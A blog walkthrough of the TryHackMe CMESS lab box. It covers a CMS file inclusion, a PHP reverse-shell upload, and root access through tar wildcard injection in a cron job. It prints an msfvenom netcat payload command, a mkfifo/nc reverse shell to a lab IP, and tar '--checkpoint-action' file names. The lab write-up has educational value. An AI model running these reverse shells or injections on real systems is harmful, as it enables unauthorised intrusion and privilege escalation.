TryHackMe’s CMESS walkthrough

 

This is going to be a simple walkthrough on how I did CMESS box on TryHackMe.com. The privilege escalation demonstartes a really good use of wildcard exploitation. The creator of the box is Optional and thank you to him for creating an awesome fun box.

Let’s g3t 4 Sh3ll

First things first we’re told to add the hostname to our /etc/hosts file.

So kicking off the box with an nmap scan we see only ports 80 and 22 open.

Heading over to port 80 we see a simple and pretty empty home page.

Running gobuster on the site gives us quite a few entries back.

As well as directories we should always enumerate for any subdomains, for that i used a tool called wfuzz.

Here we see that we got a subdomain back, so add this entry in to the hosts file also, so we can browse to it.

Upon going to our new found subdomain we see a conversation between the user, andre and support. These are both email address or possible usernames we could use in the future so make note of these.

We also see that support user has reset andre’s password so lets take that and see if we can use it anywhere. looking back at our gobuster output we can see we have a /admin directory. Lets take a look.

We find a login page that takes an email and a password, these we have so lets try it.

And we get logged in. Straight away we see a “Gila CMS version” so lets take a look if there’s any exploits for it.

Searchsploit shows that there is a LFI or Local File Inclusion for this version so lets take a look using

searchsploit -x <exploit-path>

Lets see if we can use the last bit of this url in the CMS we have access to and see if it returns anything.

Append this to the end of our URL.

Okay great! we see we have some type of directory listing now with some upload functionaly so lets see if we can upload a shell.

We manage to upload a payload which goes in to the “assets” directory. Lets start listener and then browse to http://cmess.thm/assets/php-reverse-shell.php to get the server to process the payload.

Awesome we have a shell as www-data. Looking around we see we cant get in to the andre directory, so our next step is lateral movement to andre.

Lat3ral m0ve to Andre u5er…

Lets head over to the /tmp directory and grab linenum.sh and see what we can do as www-data user and maybe see if we can find anything interesting.

Grab the linenum.sh file
“python3 -m http.server” to serve the request for “le.sh” (linenum.sh)

Kicking this off with “./le.sh -t”. The “-t” is for thorough testing, we then see in the results some interesting files lurking about.

This looks interesting so lets take a look.

Awesome we found a password!! lets see if we can now SSH to the box as andre 😀

Awesome lets grab user.txt while we’re here 🙂

L3ts g3t R00T!

Nice we got user!! lets repeat the linenum process and see if we can do anything else new. However this time im going to use an “upgraded” version of LinEnum called LinPeas. This does the same thing as linenum and some more…

Linpeas has a wicked awesome colour scheme for quickly hunting out privelege escalation points! so lets begin the hunt.

Looking in to our results from linpeas we see that its flagged a cronjob that runs as root every 2 mins.

This job is running a tar command to backup the andre users “backup” directory and everything in it.

because this tar job is running with the “*” wildcard parameter we can do a wildcard exploit. googling around we find this https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ – these guys do a great job explaining the exploit, better than me at least.

we need to create 2 directories and a shell.sh file inside /home/andre/backup directory that tar will see and interpret it as commands and execute. SUCKAA!

msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Msfvenom to create a payload
Start our listener for this payload

Head over to the directory thats going to be backed up by tar, we see a little note.

lets now echo our payload in to “shell.sh” and create the 2 directories needed for this exploit.

echo "mkfifo /tmp/obizbxg; nc 10.8.5.236 9009 0</tmp/obizbxg | /bin/bash >/tmp/obizbxg 2>&1; rm /tmp/obizbxg" > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" && echo "" > --checkpoint=1

Now we wait for the cron job to run and we should get tar interpret them commands and execute our shell.sh file.

run “date” to see the systems time

Woop Woop we got our shell back from the box!


This was a great box and really demonstrated the issues behind using wildcard’s in automated jobs or scripts, and how a hacker can leverage these vulnerabilies to gain higher privileges.

4 thoughts on “TryHackMe’s CMESS walkthrough

Add yours

  1. you can also do

    echo “cat /root/root.txt > /tmp/test.txt; chown andre:andre /tmp/test.txt” >shell.sh

    then just cat /tmp/test.txt … easy. nice writeup though.

    Like

  2. Thank you for the write-up. Watch out for typos in commands when you copy paste(“mkinfo” typo, but mkfifo detailed in screenshot).

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: